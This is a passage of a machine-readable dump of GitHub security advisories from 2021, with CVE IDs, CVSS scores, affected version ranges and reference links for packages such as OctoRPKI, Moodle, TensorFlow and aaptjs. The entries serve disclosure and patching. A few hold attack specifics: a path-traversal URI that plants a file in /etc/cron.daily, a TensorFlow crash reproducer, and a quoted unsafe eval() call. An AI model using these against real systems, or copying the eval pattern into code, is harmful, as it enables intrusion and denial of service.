'https://nvd.nist.gov/vuln/detail/CVE-2021-40831'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-cpp-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/aws-c-io/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:23:57Z', 'nvd_published_at': '2021-11-23T00:15:00Z'}" +1.4.0,GHSA-w6ww-fmfx-2x22,2021-11-10T18:14:59Z,2021-11-10T19:56:04Z,,['CVE-2021-3911'],Misconfigured IP address field in ROA leads to OctoRPKI crash,"If the ROA that a repository returns contains too many bits for the IP address then OctoRPKI will crash. + +## Patches + +## For more information +If you have any questions or comments about this advisory email us at security@cloudflare.com +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-w6ww-fmfx-2x22'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3911'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/commit/2882307febd66801de97b2a2ce4d93fe58132005'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0252'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}]","{'cwe_ids': ['CWE-20', 'CWE-252'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:14:59Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}" +1.4.0,GHSA-3pqh-p72c-fj85,2021-11-19T13:10:27Z,2021-11-19T19:34:26Z,,['CVE-2021-3978'],Improper Preservation of Permissions in github.com/cloudflare/cfrpki/cmd/octorpki,"### Impact + +When copying files with rsync, octorpki uses the ""-a"" flag 0, which forces rsync to copy binaries with the suid bit set as root. Since the provided service definition defaults to root (https://github.com/cloudflare/cfrpki/blob/master/package/octorpki.service) this could allow for a vector, when combined with another vulnerability that causes octorpki to process a malicious TAL file, for a local privilege escalation. + +## For more information + +If you have any questions or comments about this advisory email us at security@cloudflare.com",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki/cmd/octorpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-3pqh-p72c-fj85'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}]","{'cwe_ids': ['CWE-281'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-19T13:10:27Z', 'nvd_published_at': None}" +1.4.0,GHSA-m7p2-ghfh-pjvx,2022-05-04T03:44:50Z,2021-11-01T19:18:51Z,,['CVE-2020-36380'],Vulnerability in crunch function leads to arbitrary code execution via filePath parameters,"aaptjs is a node wraper for aapt. An issue was discovered in the crunch function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36380'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T18:53:19Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}" +1.4.0,GHSA-8cvr-4rrf-f244,2021-11-10T18:18:28Z,2021-11-10T20:15:44Z,,['CVE-2021-3909'],Infinite open connection causes OctoRPKI to hang forever,"OctoRPKI does not limit the length of a connection, allowing for a slowloris DOS attack to take place which makes OctoRPKI wait forever. Specifically, the repository that OctoRPKI sends HTTP requests to will keep the connection open for a day before a response is returned, but does keep drip feeding new bytes to keep the connection alive. + +## Patches + +## For more information +If you have any questions or comments about this advisory email us at security@cloudflare.com +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki/cmd/octorpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-8cvr-4rrf-f244'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3909'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/releases/tag/v1.4.0'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5033'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:18:28Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}" +1.4.0,GHSA-cqh2-vc2f-q4fh,2021-11-10T18:16:54Z,2021-11-10T20:08:29Z,,['CVE-2021-3907'],Arbitrary filepath traversal via URI injection ,"OctoRPKI does not escape a URI with a filename containing "".."", this allows a repository to create a file, (ex. `rsync://example.org/repo/../../etc/cron.daily/evil.roa`), which would then be written to disk outside the base cache folder. This could allow for remote code execution on the host machine OctoRPKI is running on. + +## Patches + +## For more information +If you have any questions or comments about this advisory email us at security@cloudflare.com +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-3jhm-87m6-x959'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-cqh2-vc2f-q4fh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3907'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/commit/eb9cc4db7b7b79e44f56dfaa959fccdfb2af8284'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0248'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5033'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}]","{'cwe_ids': ['CWE-20', 'CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:16:54Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}" +1.4.0,GHSA-vhrp-8qx4-vr6c,2023-08-08T19:59:04Z,2021-11-19T20:18:20Z,,['CVE-2021-43996'],Incorrect Access Control in Ignition,"The Ignition component before 1.16.15, and 2.0.x before 2.0.6, for Laravel has a ""fix variable names"" feature that can lead to incorrect access control.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'facade/ignition'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.15'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'facade/ignition'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43996'}, {'type': 'WEB', 'url': 'https://github.com/facade/ignition/pull/285'}, {'type': 'PACKAGE', 'url': 'https://github.com/facade/ignition'}, {'type': 'WEB', 'url': 'https://github.com/facade/ignition/compare/1.16.14...1.16.15'}, {'type': 'WEB', 'url': 'https://github.com/facade/ignition/compare/2.0.5...2.0.6'}]","{'cwe_ids': ['CWE-284'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-18T21:07:26Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}" +1.4.0,GHSA-wpfp-q843-v772,2022-06-17T01:13:12Z,2021-11-23T00:00:51Z,,['CVE-2021-43558'],Cross-site Scripting in moodle,"A flaw was found in Moodle in versions 3.11 to 3.11.3, 3.10 to 3.10.7, 3.9 to 3.9.10 and earlier unsupported versions. A URL parameter in the filetype site administrator tool required extra sanitizing to prevent a reflected XSS risk.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0'}, {'fixed': '3.11.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0'}, {'fixed': '3.10.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43558'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2021515'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=429097'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2022-06-17T01:13:12Z', 'nvd_published_at': '2021-11-22T16:15:00Z'}" +1.4.0,GHSA-f99g-pg48-wrfc,2021-11-17T21:13:01Z,2021-11-15T23:19:26Z,,['CVE-2021-3932'],twill is vulnerable to Cross-Site Request Forgery (CSRF),twill is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'area17/twill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'area17/twill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3932'}, {'type': 'WEB', 'url': 'https://github.com/area17/twill/commit/5cded9fc'}, {'type': 'WEB', 'url': 'https://github.com/area17/twill/commit/81d80d1fbbdd8bb73c020f03c623fd4487bd9b78'}, {'type': 'PACKAGE', 'url': 'https://github.com/area17/twill'}, {'type': 'WEB', 'url': 'https://github.com/area17/twill/commits/bab94c1e'}, {'type': 'WEB', 'url': 'https://github.com/area17/twill/releases/tag/1.2.5'}, {'type': 'WEB', 'url': 'https://github.com/area17/twill/releases/tag/2.5.3'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6ef21e34-f6d9-445a-b657-375c53dc2b43'}]","{'cwe_ids': ['CWE-268', 'CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T21:56:41Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}" +1.4.0,GHSA-8jhp-2gcr-qw96,2023-07-11T18:17:30Z,2021-11-23T00:00:51Z,,['CVE-2021-3943'],Moodle vulnerable to RCE via unsafe deserialization,"A flaw was found in Moodle in versions 3.11 to 3.11.3, 3.10 to 3.10.7, 3.9 to 3.9.10 and earlier unsupported versions. A remote code execution risk when restoring backup files was identified.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11'}, {'fixed': '3.11.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.11.3'}}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10'}, {'fixed': '3.10.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.10.7'}}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9'}, {'fixed': '3.9.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.9.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3943'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/58e8ad852f9e75c8158e5bee02c273383f7d9865'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2021963'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=429095'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T18:17:30Z', 'nvd_published_at': '2021-11-22T16:15:00Z'}" +1.4.0,GHSA-7v94-64hj-m82h,2021-11-08T22:39:54Z,2021-11-10T19:02:57Z,,['CVE-2021-41207'],FPE in `ParallelConcat`,"### Impact +The [implementation of `ParallelConcat`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/inplace_ops.cc#L72-L97) misses some input validation and can produce a division by 0: + +```python +import tensorflow as tf + +@tf.function +def test(): + y = tf.raw_ops.ParallelConcat(values=[['tf']],shape=0) + return y + +test() +``` + +### Patches +We have patched the issue in GitHub commit [f2c3931113eaafe9ef558faaddd48e00a6606235](https://github.com/tensorflow/tensorflow/commit/f2c3931113eaafe9ef558faaddd48e00a6606235). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7v94-64hj-m82h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41207'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f2c3931113eaafe9ef558faaddd48e00a6606235'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:39:54Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}" +1.4.0,GHSA-qppg-v75c-r5ff,2023-08-31T00:42:34Z,2021-11-30T22:21:36Z,,['CVE-2021-32061'],S3Scanner allows Directory Traversal,"S3Scanner before 2.0.2 allows Directory Traversal via a crafted bucket, as demonstrated by a `../` substring in a `ListBucketResult` element.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 's3scanner'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32061'}, {'type': 'WEB', 'url': 'https://github.com/sa7mon/S3Scanner/issues/122'}, {'type': 'WEB', 'url': 'https://github.com/sa7mon/S3Scanner/commit/fafa30a3bd35b496b3f7db9bfc35b75a8a06bcd1'}, {'type': 'PACKAGE', 'url': 'https://github.com/sa7mon/S3Scanner/'}, {'type': 'WEB', 'url': 'https://github.com/sa7mon/S3Scanner/releases/tag/2.0.2'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/62'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T16:20:13Z', 'nvd_published_at': '2021-11-29T03:15:00Z'}" +1.4.0,GHSA-6rvj-pw9w-jcvc,2021-10-13T17:27:56Z,2021-11-19T20:39:35Z,,['CVE-2021-41867'],Information disclosure vulnerability in OnionShare,An information disclosure vulnerability in OnionShare 2.3 before 2.4 allows remote unauthenticated attackers to retrieve the full list of participants of a non-public OnionShare node via the --chat feature. ,[],"[{'package': {'ecosystem': 'PyPI', 'name': 'onionshare-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3'}, {'fixed': '2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41867'}, {'type': 'PACKAGE', 'url': 'https://github.com/onionshare/onionshare'}, {'type': 'WEB', 'url': 'https://github.com/onionshare/onionshare/compare/v2.3.3...v2.4'}, {'type': 'WEB', 'url': 'https://www.ihteam.net/advisory/onionshare/'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T15:16:30Z', 'nvd_published_at': '2021-10-04T14:15:00Z'}" +1.4.0,GHSA-35m5-8cvj-8783,2021-11-08T18:58:04Z,2021-11-10T16:28:46Z,,['CVE-2021-39182'],Improper hashing in enrocrypt,"### Impact +The vulnerability is we used MD5 hashing Algorithm In our hashing file. If anyone who is a beginner(and doesn't know about hashes) can face problems as MD5 is considered a Insecure Hashing Algorithm. + +### Patches +The vulnerability is patched in v1.1.4 of the product, the users can upgrade to version 1.1.4. + +### Workarounds +If u specifically want a version and don't want to upgrade, you can remove the `MD5` hashing function from the file `hashing.py` and this vulnerability will be gone + +### References +https://www.cybersecurity-help.cz/vdb/cwe/916/ +https://www.cybersecurity-help.cz/vdb/cwe/327/ +https://www.cybersecurity-help.cz/vdb/cwe/328/ +https://www.section.io/engineering-education/what-is-md5/ +https://www.johndcook.com/blog/2019/01/24/reversing-an-md5-hash/ + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [**Enrocrypt's Official Repo**](http://www.github.com/Morgan-Phoenix/EnroCrypt) +* Create a Discussion in [**Enrocrypt's Official Repo**](http://www.github.com/Morgan-Phoenix/EnroCrypt) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'enrocrypt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Morgan-Phoenix/EnroCrypt/security/advisories/GHSA-35m5-8cvj-8783'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39182'}, {'type': 'WEB', 'url': 'https://github.com/Morgan-Phoenix/EnroCrypt/commit/e652d56ac60eadfc26489ab83927af13a9b9d8ce'}, {'type': 'PACKAGE', 'url': 'https://github.com/Morgan-Phoenix/EnroCrypt'}]","{'cwe_ids': ['CWE-326', 'CWE-327', 'CWE-328', 'CWE-916'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T18:58:04Z', 'nvd_published_at': '2021-11-08T15:15:00Z'}" +1.4.0,GHSA-8gwj-8hxc-285w,2021-11-08T17:43:16Z,2021-11-08T17:43:27Z,,['CVE-2021-23509'],Prototype Pollution in json-ptr,This affects the package `json-ptr` before `3.0.0`. A type confusion vulnerability can lead to a bypass of CVE-2020-7766 when the user-provided keys used in the pointer parameter are arrays.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'json-ptr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23509'}, {'type': 'WEB', 'url': 'https://github.com/flitbit/json-ptr/pull/42'}, {'type': 'WEB', 'url': 'https://github.com/flitbit/json-ptr/commit/5dc458fbad1c382a2e3ca6d62e66ede3d92849ca'}, {'type': 'PACKAGE', 'url': 'https://github.com/flitbit/json-ptr'}, {'type': 'WEB', 'url': 'https://github.com/flitbit/json-ptr%23security-vulnerabilities-resolved'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSONPTR-1577291'}]","{'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:56:49Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}" +1.4.0,GHSA-w6v7-w58j-pg5r,2021-11-15T14:59:59Z,2021-11-15T17:40:51Z,,['CVE-2021-41038'],Improper Verification of Communication Channel in @theia/plugin-ext,"In versions of the @theia/plugin-ext component of Eclipse Theia prior to 1.18.0, Webview contents can be hijacked via postMessage().","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@theia/plugin-ext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41038'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/pull/10125'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=575924'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse-theia/theia'}]","{'cwe_ids': ['CWE-940'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-12T19:46:56Z', 'nvd_published_at': '2021-11-10T17:15:00Z'}" +1.4.0,GHSA-46rx-6jg9-4fh8,2021-11-08T17:58:59Z,2021-11-08T17:59:15Z,,['CVE-2021-43324'],Cross-site Scripting in LibreNMS,LibreNMS through 21.10.2 allows XSS via a widget title.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.11.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 21.10.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43324'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/commit/99d2462b80435b91a35236639b909eebee432126'}, {'type': 'PACKAGE', 'url': 'https://github.com/librenms/librenms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T17:03:09Z', 'nvd_published_at': '2021-11-03T15:15:00Z'}" +1.4.0,GHSA-4qwq-q4pr-rr7r,2022-05-04T03:45:26Z,2021-11-02T15:42:38Z,,['CVE-2020-36378'],Vulnerability in packageCmd function leads to arbitrary code execution via filePath parameters,"aaptjs is a node wraper for aapt. An issue was discovered in the packageCmd function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36378'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:24:18Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}" +1.4.0,GHSA-3rcw-9p9x-582v,2022-10-21T13:05:05Z,2021-11-10T16:54:02Z,,['CVE-2021-41228'],Code injection in `saved_model_cli`,"### Impact +TensorFlow's `saved_model_cli` tool is vulnerable to a code injection as it [calls `eval` on user supplied strings](https://github.com/tensorflow/tensorflow/blob/87462bfac761435a46641ff2f10ad0b6e5414a4b/tensorflow/python/tools/saved_model_cli.py#L524-L550) + +```python +def preprocess_input_exprs_arg_string(input_exprs_str): + ... + for input_raw in filter(bool, input_exprs_str.split(';')): + ... + input_key, expr = input_raw.split('=', 1) + input_dict[input_key] = eval(expr) + ... +``` + +This can be used by attackers to run arbitrary code on the plaform where the CLI tool runs. +However, given that the tool is always run manually, the impact of this is not severe. We have patched this by adding a `safe` flag which defaults to `True` and an explicit warning for users. + +### Patches +We have patched the issue in GitHub commit [8b202f08d52e8206af2bdb2112a62fafbc546ec7](https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Omer Kaspi from Vdoo.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': 